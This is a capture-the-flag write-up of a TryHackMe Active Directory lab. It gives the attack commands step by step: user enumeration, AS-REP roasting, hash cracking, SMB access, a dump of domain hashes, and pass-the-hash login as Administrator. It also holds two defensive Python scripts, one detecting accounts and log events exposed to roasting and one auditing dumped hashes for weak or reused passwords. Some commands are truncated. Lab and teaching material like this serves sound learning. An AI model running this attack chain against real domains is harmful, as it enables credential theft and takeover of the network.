Attacking Active Directory — TryHackMe

Hey guys, this is a write-up for the TryHackMe room "Attacktive Directory". In this room we are going to exploit a vulnerable Domain Controller (DC).


Prerequisites: install Impacket and Kerbrute.


Starting off, we are going to use Nmap to enumerate this machine (default scripts, service/version detection, verbose output):

nmap -sC -sV -vv

Useful info:
Port 88: Kerberos-sec
Port 389: LDAP
DNS Domain: spookysec.local
DNS Computer Name: AttacktiveDirectory.spookysec.local

Enumerating Users with Kerbrute

After installing Kerbrute we are going to use the userenum command with the user list that the creator of the room provided to find valid usernames on the domain.

./kerbrute userenum --dc spookysec.local -d spookysec.local '/root/attacktivedirectory/users.txt' -t 100

From the results, two important users are "svc-admin" and "backup".


After enumerating, we will try to exploit a feature of Kerberos with an attack called "AS-REP roasting".

AS-REP roasting is possible when a user account has the setting "Does not require Kerberos preauthentication" enabled. This means the account does not need to prove its identity before requesting a Kerberos ticket for that account, so the KDC will hand out a reply for it to anyone who asks, and that reply can be cracked offline.
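From the defender's side, the setting described above is a single bit in the account's userAccountControl attribute, and a roasting request leaves a trace in the Security log as a TGT request (event 4768) with Pre-Authentication Type 0. The following Python is an added example, not part of the write-up or of Kerbrute/Impacket: it audits a constructed directory export for enabled accounts with that bit set, and scans constructed, simplified key=value log lines for such requests. The bit value (0x400000, ADS_UF_DONT_REQUIRE_PREAUTH) is taken from the AD schema; the log format is an assumption made for the example.

```python
import re

# userAccountControl bits (values from the AD schema documentation).
DONT_REQ_PREAUTH = 0x400000   # "Do not require Kerberos preauthentication"
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200

# Constructed directory export: (sAMAccountName, userAccountControl). Not real data.
SAMPLE_ACCOUNTS = [
    ("svc-admin", NORMAL_ACCOUNT | DONT_REQ_PREAUTH),                  # roastable
    ("backup", NORMAL_ACCOUNT | 0x10000),                              # pre-auth required
    ("old-svc", NORMAL_ACCOUNT | DONT_REQ_PREAUTH | ACCOUNTDISABLE),   # flag set, but disabled
    ("Administrator", NORMAL_ACCOUNT),
]


def asrep_roastable(accounts):
    """Return enabled accounts whose userAccountControl has DONT_REQ_PREAUTH set.

    Disabled accounts are skipped: the KDC will not issue a ticket for them, so
    they are a hygiene finding rather than an exposure."""
    return [name for name, uac in accounts
            if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE]


# Constructed Security-log lines in a simplified key=value layout (assumed for the
# example; real Windows events are XML/EVTX). Event 4768 is a TGT request;
# PreAuthType 0 means the ticket was issued without pre-authentication.
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=svc-admin PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.0.0.50
EventID=4768 TargetUserName=jdoe PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.0.0.21
EventID=4768 TargetUserName=backup PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.0.0.22
EventID=4769 TargetUserName=svc-admin PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.0.0.50
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def asrep_requests(log_text):
    """Flag 4768 events with PreAuthType 0 as (user, source IP, encryption type).

    Only 4768 counts: a 4769 (service ticket) line with the same fields is
    ignored, which is why the last constructed line is not reported."""
    hits = []
    for line in log_text.splitlines():
        fields = dict(FIELD_RE.findall(line))
        if fields.get("EventID") == "4768" and fields.get("PreAuthType") == "0":
            hits.append((fields["TargetUserName"], fields["IpAddress"],
                         fields["TicketEncryptionType"]))
    return hits


if __name__ == "__main__":
    print("accounts to fix:", asrep_roastable(SAMPLE_ACCOUNTS))
    print("suspicious TGT requests:", asrep_requests(SAMPLE_EVENTS))
```

The first function is the preventive check (clear the flag, or at least move the account to a long random password); the second is the detection that catches the request even when the flag is still set.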

We are going to use a tool from the impacket folder to obtain the password hash of the user "svc-admin" from the Key Distribution Center (KDC): -dc-ip spookysec.local/svc-admin -no-pass

Then, we are going to use John the Ripper to crack the hash:

john hash --wordlist=pass.txt

Now that we have the credentials for the “svc-admin” user, we can enumerate SMB shares to check if there is any useful information.

smbclient -L \\\\\\ -U svc-admin → to list shared folders

There are some common shared folders like C$, IPC$, NETLOGON, etc.

The folder “backup” seems interesting.

smbclient \\\\\\backup -U svc-admin → to connect to the server using smb

Inside the folder there is an interesting file:

Inside the file there is a base64 encoded text:

echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d → to decode it

The results are the credentials of the user “backup@spookysec.local”.

Privilege Escalation

We are going to use a tool from impacket to dump the NTDS.DIT, which contains the hashes of every user on the domain. Pen-testers also use this tool for password auditing: they crack the dumped hashes to check whether users are choosing strong passwords.

The same impacket tool can give us all the password hashes for the users synced with Active Directory: spookysec.local/backup:'backup2517860'@ -just-dc
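The password-auditing use mentioned above does not need a cracker for the easy cases: an NT hash is just MD4 over the UTF-16LE password, so a defender can hash a banned-password list once and compare it against the dump, and can also spot password reuse by grouping identical hashes. The following Python is an added example (not the write-up's or Impacket's code): it carries a small pure-Python MD4, hashes a constructed weak-password list, and audits constructed dump lines in the common DOMAIN\user:RID:LMhash:NThash::: layout, which is assumed here. All hashes in the sample are computed from constructed passwords; none are real credentials.

```python
import struct

MASK = 0xFFFFFFFF


def _md4(message: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). NT hashes are MD4 of the UTF-16LE password."""
    def rol(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK

    def ff(x, y, z):
        return (x & y) | (~x & z)

    def gg(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def hh(x, y, z):
        return x ^ y ^ z

    bit_len = len(message) * 8
    message += b"\x80"
    message += b"\x00" * ((56 - len(message) % 64) % 64)
    message += struct.pack("<Q", bit_len)          # length in bits, little-endian
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(message), 64):
        x = struct.unpack("<16I", message[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                        # round 1: words in order
            s = (3, 7, 11, 19)[i % 4]
            a, b, c, d = d, rol((a + ff(b, c, d) + x[i]) & MASK, s), b, c
        for i in range(16):                        # round 2: columns 0,4,8,12,1,...
            k = (i % 4) * 4 + i // 4
            s = (3, 5, 9, 13)[i % 4]
            a, b, c, d = d, rol((a + gg(b, c, d) + x[k] + 0x5A827999) & MASK, s), b, c
        for i in range(16):                        # round 3: bit-reversed order 0,8,4,12,...
            k = int(format(i, "04b")[::-1], 2)
            s = (3, 9, 11, 15)[i % 4]
            a, b, c, d = d, rol((a + hh(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, s), b, c
        a0, b0, c0, d0 = ((a0 + a) & MASK, (b0 + b) & MASK,
                          (c0 + c) & MASK, (d0 + d) & MASK)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """Lower-case hex NT hash of a password."""
    return _md4(password.encode("utf-16-le")).hex()


# Constructed banned-password list for the audit.
WEAK_PASSWORDS = ["password", "Password1", "Welcome123", "Summer2020!"]

# Well-known LM hash of an empty password (LM storage disabled).
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"


def build_sample_dump() -> str:
    """Constructed dump lines; RIDs and passwords are made up for the example."""
    users = [("spookysec.local\\Administrator", 500, "Correct-Horse-Battery-9!"),
             ("spookysec.local\\backup", 1105, "Password1"),
             ("spookysec.local\\svc-admin", 1108, "Welcome123"),
             ("spookysec.local\\jdoe", 1120, "Correct-Horse-Battery-9!")]
    return "\n".join(f"{u}:{rid}:{LM_EMPTY}:{nt_hash(pw)}:::" for u, rid, pw in users)


def audit_dump(dump_text: str, weak_passwords):
    """Return ({user: weak password matched}, [[users sharing one hash], ...])."""
    lookup = {nt_hash(p): p for p in weak_passwords}   # hash the list once
    weak, by_hash = {}, {}
    for line in dump_text.splitlines():
        parts = line.split(":")
        if len(parts) < 4:
            continue                                   # not a hash line
        user, nt = parts[0], parts[3].lower()
        by_hash.setdefault(nt, []).append(user)
        if nt in lookup:
            weak[user] = lookup[nt]
    reused = [users for users in by_hash.values() if len(users) > 1]
    return weak, reused


if __name__ == "__main__":
    found, shared = audit_dump(build_sample_dump(), WEAK_PASSWORDS)
    print("weak:", found)
    print("reused:", shared)
```

Because NT hashes are unsalted, one hash of the banned list serves the whole domain, which is exactly why a dump like this should be audited on an isolated machine and deleted afterwards.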

We found the password hash of the local Administrator account. We can use it to connect to the domain controller with administrator privileges.

We can use the pass-the-hash method for the local admin account because we have its hash from the dump we did earlier.

Pass the Hash is a hacking technique that allows an attacker to authenticate to a remote server or service by using the underlying NTLM or LanMan hash of a user’s password, instead of requiring the associated plaintext password as is normally the case.

To connect to the server we can use either the impacket tool or evil-winrm. With impacket: Administrator@ -hashes <HASH>


evil-winrm -i -u Administrator -H <HASH>

The flags are located in the Desktop directory of each user.

Capturing the flags brings us to the completion of the room.



Andreas Panagi

Cybersecurity / Computer Security student. Writing is the best way to learn. Forever No0B